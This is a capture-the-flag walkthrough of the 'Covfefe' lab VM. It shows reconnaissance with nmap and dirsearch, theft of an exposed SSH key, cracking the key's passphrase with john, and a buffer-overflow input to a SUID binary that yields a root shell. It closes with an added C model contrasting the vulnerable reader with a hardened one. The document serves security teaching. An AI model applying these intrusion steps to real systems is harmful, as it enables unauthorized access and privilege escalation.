# Covfefe

## Nmap

```
sudo nmap 192.168.184.10 -p- -sS -sV

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp    open  http    nginx 1.10.3
31337/tcp open  Elite?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

I started with port 80 but was unable to identify any directories or files. The default page on this port is the stock nginx installation page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-eb56aa406d780744e2a9bf2ef2e5ef0e44f14b86%2Fimage.png?alt=media)

Browsing to port 31337 returns a 404 Not Found. I then ran `dirsearch.py` against the port with the command below, which discovered what appeared to be the contents of a user's home directory.

```
python3 dirsearch.py -u http://192.168.184.10:31337 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-92f1e2f1eb6f1b2cfae0d390120930bdfd11e897%2Fimage.png?alt=media)

Browsing to the `/.ssh` directory lists the contents of that subfolder as well.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ba9c5ff8a6aa8ede9b406f1eebe704630bb9ebca%2Fimage.png?alt=media)

I first downloaded `id_rsa` and then `authorized_keys`.

```
http://192.168.184.10:31337/.ssh/id_rsa
http://192.168.184.10:31337/.ssh/authorized_keys
```

The contents of `authorized_keys` show that the key belongs to the user `simon`. Before using the private key, set the permissions on `id_rsa` with `chmod`, as SSH refuses keys that are readable by others.

```
chmod 600 id_rsa
```

When attempting to connect over SSH with the key, we are prompted for a passphrase.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cad27b435350946435d4aff134e20c290209e980%2Fimage.png?alt=media)

Using `ssh2john` we can convert the encrypted key into a hash format that John can crack.

```
/usr/share/john/ssh2john.py id_rsa > /home/kali/Desktop/hash
sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9da1af80542cfd908f6efa688380af972637c2d6%2Fimage.png?alt=media)

Now that we have the passphrase `starwars` for the key, we can try signing in again.

```
ssh -i id_rsa simon@192.168.184.10
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-858fb5c417db879f44806521e7cd8c4bd9a886e5%2Fimage.png?alt=media)

I then transferred `linpeas` to the box and executed it. Linpeas identified the binary `/usr/local/bin/read_message` as having the SUID bit set.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ec601720678891f82ac698e9203364734ace6b84%2Fimage.png?alt=media)

Running the binary and entering the name 'Simon' produces the following output:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3ef8c0f339284826fea60eb0b2956a3bf2ae9c81%2Fimage.png?alt=media)

As the message says, the source code is readable. Listing the contents of the root directory shows the source file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e096a9511bd6e24b0186c457e68902db82ebaa54%2Fimage.png?alt=media)

From the source, the program only compares the first 5 characters of the input to validate the name, but reads the input into a buffer of 20 bytes with no length check. We can therefore overflow the buffer so that the bytes past the 20th land in the adjacent buffer that holds the command the program executes.

Entering the following when the binary prompts for a name gives us a root shell.

```
Simonaaaaaaaaaaaaaaa/bin/sh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8612c21bb4ed7b6a0d2142170d915b7b3a7b5409%2Fimage.png?alt=media)
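To make the mechanism concrete and show how the program should have been written, here is an added example that models the reader in C. It is a hypothetical reconstruction, not the VM's actual source (which the write-up only shows in a screenshot): the 20-byte name field and the field holding the program path are laid out back to back in one flat array, and the placeholder path `/path/to/message` stands in for whatever the real binary runs. The unbounded reader reproduces the write-up's behaviour; the bounded reader shows the fix.

```c
#include <string.h>
/* Hypothetical model of the reader described in the write-up, not the VM's
 * real source: a 20-byte name field sits directly before the field holding
 * the path the SUID program executes. Both live in one flat array so the
 * overwrite can be shown without undefined behaviour. */
#define NAME_LEN 20
#define DEFAULT_PROGRAM "/path/to/message"   /* placeholder, not the real path */
enum { REJECTED = 0, ACCEPTED = 1, ACCEPTED_PATH_CLOBBERED = 2 };

static char mem[NAME_LEN + 64];   /* [0,20) = name, [20,84) = program path */

static void reader_init(void) {
    memset(mem, 0, sizeof mem);
    strcpy(mem + NAME_LEN, DEFAULT_PROGRAM);
}

static int classify(int accepted) {
    if (!accepted) return REJECTED;
    return strcmp(mem + NAME_LEN, DEFAULT_PROGRAM) == 0 ? ACCEPTED : ACCEPTED_PATH_CLOBBERED;
}

/* Vulnerable reader: like gets(), copies every input byte with no bound, so
 * bytes past the 20th land in the program field; only 5 bytes are checked. */
int run_unbounded(const char *input) {
    size_t n = strlen(input) + 1;
    reader_init();
    if (n > sizeof mem) return REJECTED;   /* keep the model itself in bounds */
    memcpy(mem, input, n);
    return classify(strncmp(mem, "Simon", 5) == 0);
}

/* Hardened reader: refuse input that does not fit the field (a bounded read
 * plus a length check) and compare the whole name, so extra bytes can neither
 * spill over nor ride along on a five-character prefix match. */
int run_bounded(const char *input) {
    reader_init();
    if (strlen(input) >= NAME_LEN) return REJECTED;
    strcpy(mem, input);
    return classify(strcmp(mem, "Simon") == 0);
}

/* Path the model would execute after the most recent run. */
const char *program_path(void) { return mem + NAME_LEN; }

/* The write-up's input, built from its description: the 5-byte name, 15 bytes
 * of padding to fill the 20-byte field, then the path that spills over. */
const char *page_payload(void) {
    static char p[NAME_LEN + 8];
    memcpy(p, "Simon", 5);
    memset(p + 5, 'a', NAME_LEN - 5);
    strcpy(p + NAME_LEN, "/bin/sh");
    return p;
}
```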
